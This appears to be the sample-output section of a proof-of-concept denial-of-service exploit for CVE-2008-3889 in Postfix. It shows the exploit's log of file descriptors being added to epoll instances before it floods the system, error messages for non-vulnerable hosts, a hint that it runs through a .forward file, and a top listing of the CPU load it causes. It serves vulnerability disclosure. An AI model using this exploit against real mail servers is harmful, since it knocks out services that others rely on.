This is an example of the output /tmp/postfix.log on a vulnerable system [*] Opening directory /proc/7101/fd => 9 points to anon_inode:[eventpoll] [*] Adding fd 3 to eventpoll 9 => Fd 3 added! [*] Adding fd 6 to eventpoll 9 => Fd 6 added! [*] Adding fd 7 to eventpoll 9 => Fd 7 added! . . . [*] Adding fd 205 to eventpoll 9 => Fd 205 added! [*] Adding fd 206 to eventpoll 9 => Fd 206 added! [*] Adding fd 207 to eventpoll 9 => Fd 207 added! => 12 points to anon_inode:[eventpoll] [*] Adding fd 3 to eventpoll 12 => Fd 3 added! [*] Adding fd 208 to eventpoll 12 => Fd 208 added! [*] Adding fd 209 to eventpoll 12 => Fd 209 added! . . . [*] Adding fd 405 to eventpoll 12 => Fd 405 added! [*] Adding fd 406 to eventpoll 12 => Fd 406 added! [*] Adding fd 407 to eventpoll 12 => Fd 407 added! [*] Starting to flood the system! If your system is not vulnerable, or you launch the exploit from the command line, you will get something like this: [*] Opening directory /proc/7129/fd [!] Are you sure that your postfix is vulnerable? [!] Are you launching me throw a .forward file? This is an example of the top output with only one email: top - 21:12:46 up 1:55, 4 users, load average: 0.19, 0.47, 0.39 Tasks: 132 total, 5 running, 127 sleeping, 0 stopped, 0 zombie Cpu(s): 16.5%us, 68.7%sy, 0.0%ni, 14.6%id, 0.0%wa, 0.2%hi, 0.0%si, 0.0%st Mem: 2047376k total, 858448k used, 1188928k free, 99296k buffers Swap: 2010920k total, 0k used, 2010920k free, 373428k cached PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 7047 postfix 20 0 5500 2056 1552 R 70 0.1 0:02.10 local 7049 whats 20 0 1572 428 360 R 61 0.0 0:01.82 CVE-2008-3889-e 6988 root 20 0 5264 1536 1192 S 17 0.1 0:18.46 master 6058 root 20 0 371m 65m 9964 S 14 3.3 14:51.19 X 6246 whats 20 0 133m 44m 24m R 6 2.2 9:03.45 amarokapp 6352 whats 20 0 272m 116m 27m S 2 5.8 5:41.97 firefox-bin 4 root 15 -5 0 0 0 S 1 0.0 0:00.72 ksoftirqd/0 6226 whats 20 0 27508 9620 7260 S 1 0.5 0:01.34 kded 6581 whats 20 0 52000 19m 11m R 1 1.0 0:11.70 gnome-terminal 6200 whats 20 0 89608 29m 17m S 0 1.5 0:10.04 pidgin 1 root 20 0 1592 548 472 S 0 0.0 0:01.42 init 2 root 15 -5 0 0 0 S 0 0.0 0:00.00 kthreadd 3 root RT -5 0 0 0 S 0 0.0 0:00.04 migration/0 5 root RT -5 0 0 0 S 0 0.0 0:00.02 migration/1 6 root 15 -5 0 0 0 S 0 0.0 0:02.40 ksoftirqd/1 7 root 15 -5 0 0 0 S 0 0.0 0:00.28 events/0 8 root 15 -5 0 0 0 S 0 0.0 0:00.40 events/1 9 root 15 -5 0 0 0 S 0 0.0 0:00.02 khelper 110 root 15 -5 0 0 0 S 0 0.0 0:00.04 kblockd/0 111 root 15 -5 0 0 0 S 0 0.0 0:00.00 kblockd/1 114 root 15 -5 0 0 0 S 0 0.0 0:00.00 kacpid 115 root 15 -5 0 0 0 S 0 0.0 0:00.00 kacpi_notify 199 root 15 -5 0 0 0 S 0 0.0 0:00.00 cqueue 203 root 15 -5 0 0 0 S 0 0.0 0:00.00 ata/0 204 root 15 -5 0 0 0 S 0 0.0 0:00.00 ata/1 205 root 15 -5 0 0 0 S 0 0.0 0:00.00 ata_aux 207 root 15 -5 0 0 0 S 0 0.0 0:00.00 ksuspend_usbd 212 root 15 -5 0 0 0 S 0 0.0 0:00.00 khubd 215 root 15 -5 0 0 0 S 0 0.0 0:00.00 kseriod 223 root 15 -5 0 0 0 S 0 0.0 0:00.00 kmmcd 242 root 15 -5 0 0 0 S 0 0.0 0:00.58 kondemand/0 243 root 15 -5 0 0 0 S 0 0.0 0:00.00 kondemand/1 276 root 20 0 0 0 0 S 0 0.0 0:00.00 pdflush 277 root 20 0 0 0 0 S 0 0.0 0:00.88 pdflush 278 root 15 -5 0 0 0 S 0 0.0 0:00.00 kswapd0 Tested with gentoo and debian package. - whats